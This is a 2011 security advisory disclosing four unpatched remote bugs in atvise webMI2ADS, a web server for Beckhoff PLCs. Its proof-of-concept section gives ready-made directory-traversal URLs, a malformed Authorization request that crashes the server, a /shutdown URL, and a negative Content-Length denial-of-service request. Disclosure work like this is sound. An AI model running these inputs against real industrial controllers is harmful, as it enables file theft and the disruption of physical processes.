####################################################################### Luigi Auriemma Application: atvise webMI2ADS - Web server for Beckhoff PLCs http://www.atvise.com/en/atvise-downloads/products Versions: <= 1.0 Platforms: Windows XP embedded and CE x86/ARM Bugs: A] directory traversal B] NULL pointer C] termination of the software D] resources consumption Exploitation: remote Date: 10 Oct 2011 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bugs 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== From vendor's website: "webMI2ADS is a very slim and compact web server with an ADS interface (Beckhoff native PLC interface). It can be integrated on nearly any ethernet based Beckhoff PLC and provides full data access including automatic import of all PLC variables and types." ####################################################################### ======= 2) Bugs ======= ---------------------- A] directory traversal ---------------------- Classical directory traversal through the backslash delimiter which allows to get the files located on the disk where is running the server. --------------- B] NULL pointer --------------- NULL pointer dereference caused by the lacking of checks on the value returned by strchr on the Authorization Basic HTTP field: 0043094F |> 6A 06 PUSH 6 ; /maxlen = 6 00430951 |. 68 7CAB4400 PUSH webMI2AD.0044AB7C ; |s2 = "Basic " 00430956 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] ; | 00430959 |. 50 PUSH EAX ; |s1 0043095A |. FF15 10044400 CALL DWORD PTR DS:[<&MSVCR90._strnicmp>] ; \_strnicmp ...skip... 004309BC |. 6A 3A PUSH 3A ; /c = 3A (':') 004309BE |. 8D8D F8FEFFFF LEA ECX,DWORD PTR SS:[EBP-108] ; | 004309C4 |. 51 PUSH ECX ; |s 004309C5 |. FF15 FC034400 CALL DWORD PTR DS:[<&MSVCR90.strchr>] ; \strchr 004309CB |. 83C4 08 ADD ESP,8 004309CE |. 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX 004309D1 |. 837D FC 00 CMP DWORD PTR SS:[EBP-4],0 004309D5 |. 74 4B JE SHORT webMI2AD.00430A22 004309D7 |. 8B55 F4 MOV EDX,DWORD PTR SS:[EBP-C] 004309DA |. 2B55 FC SUB EDX,DWORD PTR SS:[EBP-4] 004309DD |. 83FA 40 CMP EDX,40 004309E0 |. 7D 40 JGE SHORT webMI2AD.00430A22 004309E2 |. 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 004309E5 |. C600 00 MOV BYTE PTR DS:[EAX],0 ------------------------------ C] termination of the software ------------------------------ For terminating the software remotely it's enough to go on the /shutdown webpage. ------------------------ D] resources consumption ------------------------ Endless loop with memory consumption and CPU at 100% caused by a particular negative Content-Length. ####################################################################### =========== 3) The Code =========== http://aluigi.org/mytoolz/mydown.zip http://aluigi.org/testz/udpsz.zip A] mydown http://SERVER/..\..\..\..\..\..\..\boot.ini mydown http://SERVER/..%5c..%5c..%5c..%5c..%5c..%5cboot.ini B] udpsz -c "GET / HTTP/1.0\r\nAuthorization: Basic blah\r\n\r\n" -T -D SERVER 80 -1 C] http://SERVER/shutdown D] udpsz -c "POST / HTTP/1.0\r\nContent-Length: -30\r\n\r\n" -T -D SERVER 80 -1 ####################################################################### ====== 4) Fix ====== No fix. #######################################################################